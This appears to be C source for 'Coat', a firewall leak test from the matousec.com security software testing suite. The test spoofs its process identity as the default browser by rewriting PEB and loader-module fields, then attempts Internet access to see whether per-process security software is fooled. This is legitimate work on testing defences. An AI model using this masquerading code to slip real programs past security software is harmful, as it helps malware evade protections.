/*

 Security Software Testing Suite - Coat (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * The original idea by www.matousec.com, Different Internet Experience Ltd.


 Method description:

   * Locate basic information about the current process  (command line, executable image path,
     name of image, image size, image base, entry point, ...) inside own virtual address space.

   * Obtain the similar information about the default browser by reading and parsing its executable.

   * Replace the information inside the current process so that it matches the information
     about the default browser.

   * Try to access the Internet. Some systems that implement per-process security
     obtain the information about the offending process from its virtual memory just after
     it attempts to perform a controlled operation such as Internet access.

*/


#include <stdio.h>
#include <windows.h>
#include <wininet.h>

#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-hook.h"


int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
  COM_CONF conf;
  if (!com_console_init_winmain("Coat","coat",lpCmdLine,&conf,COM_TEST_TYPE_COAT)) return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll"};
  if (!com_hook_load_libraries(used_dlls,2)) return 1;

  int res=FALSE;

  char *fakeinfo=NULL;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  PPEB peb=com_get_peb();
  if (peb)
  {
    if (com_verbosity_get()) printf("PEB found at 0x%p\n",peb);

    PRTL_USER_PROCESS_PARAMETERS userpp=peb->ProcessParameters;
    if (userpp)
    {
      if (com_verbosity_get()) printf("User process parameters found at 0x%p\n\n",userpp);

      char defbrows[MAX_PATH],defbrows_exe[MAX_PATH],defbrows_cmd[MAX_PATH];
      if (com_get_default_browser_path(defbrows,sizeof(defbrows),&err_inf))
      {
        char *exename=strrchr(defbrows,'\\');
        if (exename) exename++;
        else exename=defbrows;

        strncpy(defbrows_exe,exename,sizeof(defbrows_exe));
        defbrows_exe[sizeof(defbrows_exe)-1]='\0';

        snprintf(defbrows_cmd,MAX_PATH,"\"%s\"",defbrows);

        if (com_verbosity_get())
        {
          printf("Default browser's information:\n");
          printf("  Image path   = \"%s\"\n",defbrows);
          printf("  Image name   = \"%s\"\n",defbrows_exe);
          printf("  Command line = %s\n",defbrows_cmd);
        }

        COM_IMAGE_INFO br_info;
        if (com_get_image_info(defbrows,&br_info,&err_inf))
        {
          if (com_verbosity_get())
          {
            printf("  Image base   = 0x%p\n"
                   "  Image size   = 0x%lX\n"
                   "  Entry point  = 0x%p\n"
                   "  Sub system   = 0x%X\n\n",
                   br_info.image_base,br_info.image_size,br_info.entry_point,br_info.sub_system);
          }

          peb->ImageBaseAddress=br_info.image_base;
          peb->ImageSubSystem=br_info.sub_system;

          fakeinfo=VirtualAlloc(NULL,4*(1024+sizeof(UNICODE_STRING)),MEM_COMMIT,PAGE_READWRITE);
          if (fakeinfo)
          {
            ANSI_STRING as_cmd,as_full,as_exe,as_title;
            as_cmd.Buffer   = defbrows_cmd;
            as_full.Buffer  = defbrows;
            as_exe.Buffer   = defbrows_exe;
            as_title.Buffer = COM_INET_BROWSER_TITLE;

            as_cmd.Length   = strlen(as_cmd.Buffer);
            as_full.Length  = strlen(as_full.Buffer);
            as_exe.Length   = strlen(as_exe.Buffer);
            as_title.Length = strlen(as_title.Buffer);

            as_cmd.MaximumLength   = as_cmd.Length;
            as_full.MaximumLength  = as_full.Length;
            as_exe.MaximumLength   = as_exe.Length;
            as_title.MaximumLength = as_title.Length;

            PUNICODE_STRING us_cmd,us_full,us_exe,us_title;
            us_cmd   = (PVOID)&fakeinfo[0*sizeof(UNICODE_STRING)];
            us_full  = (PVOID)&fakeinfo[1*sizeof(UNICODE_STRING)];
            us_exe   = (PVOID)&fakeinfo[2*sizeof(UNICODE_STRING)];
            us_title = (PVOID)&fakeinfo[3*sizeof(UNICODE_STRING)];

            char *us_start=&fakeinfo[4*sizeof(UNICODE_STRING)];
            us_cmd->Buffer   = (PWSTR)&us_start[0*1024];
            us_full->Buffer  = (PWSTR)&us_start[1*1024];
            us_exe->Buffer   = (PWSTR)&us_start[2*1024];
            us_title->Buffer = (PWSTR)&us_start[3*1024];

            us_cmd->Length   = 0;
            us_full->Length  = 0;
            us_exe->Length   = 0;
            us_title->Length = 0;

            us_cmd->MaximumLength   = 1024;
            us_full->MaximumLength  = 1024;
            us_exe->MaximumLength   = 1024;
            us_title->MaximumLength = 1024;

            NTSTATUS con1=RtlAnsiStringToUnicodeString(us_cmd,&as_cmd,FALSE);
            NTSTATUS con2=RtlAnsiStringToUnicodeString(us_full,&as_full,FALSE);
            NTSTATUS con3=RtlAnsiStringToUnicodeString(us_exe,&as_exe,FALSE);
            NTSTATUS con4=RtlAnsiStringToUnicodeString(us_title,&as_title,FALSE);

            UNICODE_STRING org_cmd,org_title,org_full,org_exe,org_path;
            PVOID org_entry_point=NULL,org_image_base=NULL;
            DWORD org_image_size=0;

            if ((con1==STATUS_SUCCESS) && (con2==STATUS_SUCCESS) && (con3==STATUS_SUCCESS) && (con4==STATUS_SUCCESS))
            {
              memcpy(&org_path,&userpp->ImagePathName,sizeof(UNICODE_STRING));
              memcpy(&org_cmd,&userpp->CommandLine,sizeof(UNICODE_STRING));
              memcpy(&org_title,&userpp->WindowTitle,sizeof(UNICODE_STRING));

              memcpy(&userpp->ImagePathName,us_full,sizeof(UNICODE_STRING));
              memcpy(&userpp->CommandLine,us_cmd,sizeof(UNICODE_STRING));
              memcpy(&userpp->WindowTitle,us_title,sizeof(UNICODE_STRING));


              char mod_name[MAX_PATH];
              if (com_get_module_name(NULL,mod_name,sizeof(mod_name),&err_inf))
              {
                int info_changed=FALSE;
                PLDR_MODULE module=(PLDR_MODULE)peb->LoaderData->InLoadOrderModuleList.Flink,first_module=module;
                do
                {
                  ANSI_STRING as_mod_name;
                  if (module->FullDllName.Length && (RtlUnicodeStringToAnsiString(&as_mod_name,&module->FullDllName,TRUE)==STATUS_SUCCESS))
                  {
                    if (!stricmp(mod_name,as_mod_name.Buffer))
                    {
                      if (!org_image_size)
                      {
                        memcpy(&org_full,&module->FullDllName,sizeof(UNICODE_STRING));
                        memcpy(&org_exe,&module->BaseDllName,sizeof(UNICODE_STRING));
                        org_entry_point=module->EntryPoint;
                        org_image_base=module->BaseAddress;
                        org_image_size=module->SizeOfImage;
                      }

                      memcpy(&module->FullDllName,us_full,sizeof(UNICODE_STRING));
                      memcpy(&module->BaseDllName,us_exe,sizeof(UNICODE_STRING));
                      module->EntryPoint=br_info.entry_point;
                      module->BaseAddress=br_info.image_base;
                      module->SizeOfImage=br_info.image_size;
                      info_changed=TRUE;
                    }
                    RtlFreeAnsiString(&as_mod_name);
                  }
                  module=(PLDR_MODULE)module->InLoadOrderModuleList.Flink;
                } while ((first_module->InLoadOrderModuleList.Blink!=(PVOID)module));

                if (info_changed)
                {
                  printf("Initialization of Coat succeeded.\n");

                  printf("Trying to access Internet page \"%s\".\n"
                         "If your security software alerts you about this attempt, deny it!\n\n",conf.uri);

                  char buffer[4096];
                  res=com_attempt_wininet(buffer,sizeof(buffer),&conf,&err_inf)
                   && com_find_pattern_and_print_data(buffer,sizeof(buffer),&conf,&err_inf);

                  module=(PLDR_MODULE)peb->LoaderData->InLoadOrderModuleList.Flink,first_module=module;
                  do
                  {
                    ANSI_STRING as_mod_name;
                    if (module->FullDllName.Length && (RtlUnicodeStringToAnsiString(&as_mod_name,&module->FullDllName,TRUE)==STATUS_SUCCESS))
                    {
                      if (!stricmp(mod_name,as_mod_name.Buffer))
                      {
                        memcpy(&module->FullDllName,&org_full,sizeof(UNICODE_STRING));
                        memcpy(&module->BaseDllName,&org_exe,sizeof(UNICODE_STRING));
                        module->EntryPoint=org_entry_point;
                        module->BaseAddress=org_image_base;
                        module->SizeOfImage=org_image_size;
                      }
                      RtlFreeAnsiString(&as_mod_name);
                    }
                    module=(PLDR_MODULE)module->InLoadOrderModuleList.Flink;
                  } while ((first_module->InLoadOrderModuleList.Blink!=(PVOID)module));
                } else com_err_set_nc(&err_inf,"Unable to change internal process information.\n");
              }
            } else com_err_set_nc(&err_inf,"Unable to convert ansi strings to unicode strings using RtlAnsiStringToUnicodeString.\n"
                                           "Return values were 0x%lX, 0x%lX, 0x%lX, 0x%lX.\n",con1,con2,con3,con4);

            memcpy(&userpp->ImagePathName,&org_path,sizeof(UNICODE_STRING));
            memcpy(&userpp->CommandLine,&org_cmd,sizeof(UNICODE_STRING));
            memcpy(&userpp->WindowTitle,&org_title,sizeof(UNICODE_STRING));

          } else com_err_set(&err_inf,"Unable to allocate %d bytes using VirtualAlloc.\n",5*(1024+sizeof(UNICODE_STRING)));
        } else com_err_set_nc(&err_inf,"Unable to obtain the default browser's image information.\n");
      } else com_err_set_nc(&err_inf,"Unable to obtain the default browser's path.\n");
    } else com_err_set_nc(&err_inf,"Unable to find user process parameters.\n");
  } else com_err_set_nc(&err_inf,"Unable to find Process Environment Block (PEB).\n");

  return com_end(res,&err_inf,&conf);
}
